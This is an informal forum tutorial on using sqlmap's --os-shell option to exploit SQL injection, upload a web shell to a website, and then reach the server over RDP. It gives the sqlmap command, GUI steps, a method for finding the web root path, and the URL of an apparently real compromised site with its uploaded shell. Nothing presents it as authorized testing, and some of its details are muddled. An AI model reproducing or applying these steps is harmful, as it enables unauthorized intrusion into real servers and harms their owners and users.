RDP access & Shell uploading trough SQLMAP

Hey Salam Guyz

Today i'll tell y0uh 

Shell Uploading through SQLmap

its very easy if you have few thing ;)

-1st-

Vulnerable website with full path

-2nd-

file write privilleges

-3rd-

sqlmap

-4th-

Me :D

start it

open your sqlmap

i have sqlmap with its GUI

so work becomes very easy :D

you can also use sqlmap shell without its GUI just type this

./sqlmap.py -u http:www.site.in/index.php?id=1 --os-shell

link to use sqlmap with GUI

Here

1st tick on the url box

now paste the vulnerable link in target box

than click on Get Query and you'll see website appears on the 

"Query To Sqlmap box"

like in picture

Now 0pen "Access" tab in sqlmap

than => operating System

than => sqlshell

and tick sqlshell 

then again click on Get query

Than click on start button

than windows will pop up after 1-2 minutes 

it will ask y0u f0r enter Web application Language

like in this pic

web server is mysql so i'll choose 4 PHP (Default)

it will start working again

and than asked y0u to give web root path

"Web Root Path"

the text y0u g0t from error like

mysql_error /home/india/public_html

this is called web root path

in my case my root path is

mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\xampp\htdocs\DavWeb\src\controllers\photocontroller.php

my root path =>

C:\xampp\htdocs\DavWeb\

sometimes SQLMAP automatically get the root path like in this pic

please provide any additional web server full path to try to upload the agent 

[Enter for None]:

just press Enter

wOha! Shell uploaded =))

it will automatically connect the shell with sqlmap/cmd

Pic =>

shell uploaded =>

http://davyamunanagar.in:80/tmpbgwjw.php

========================================

you can als0 get RDP from the shell :P

just type in Run =>

mstsc.exe and enter website's ip

and enter your password and enjoy :D

thankx for reading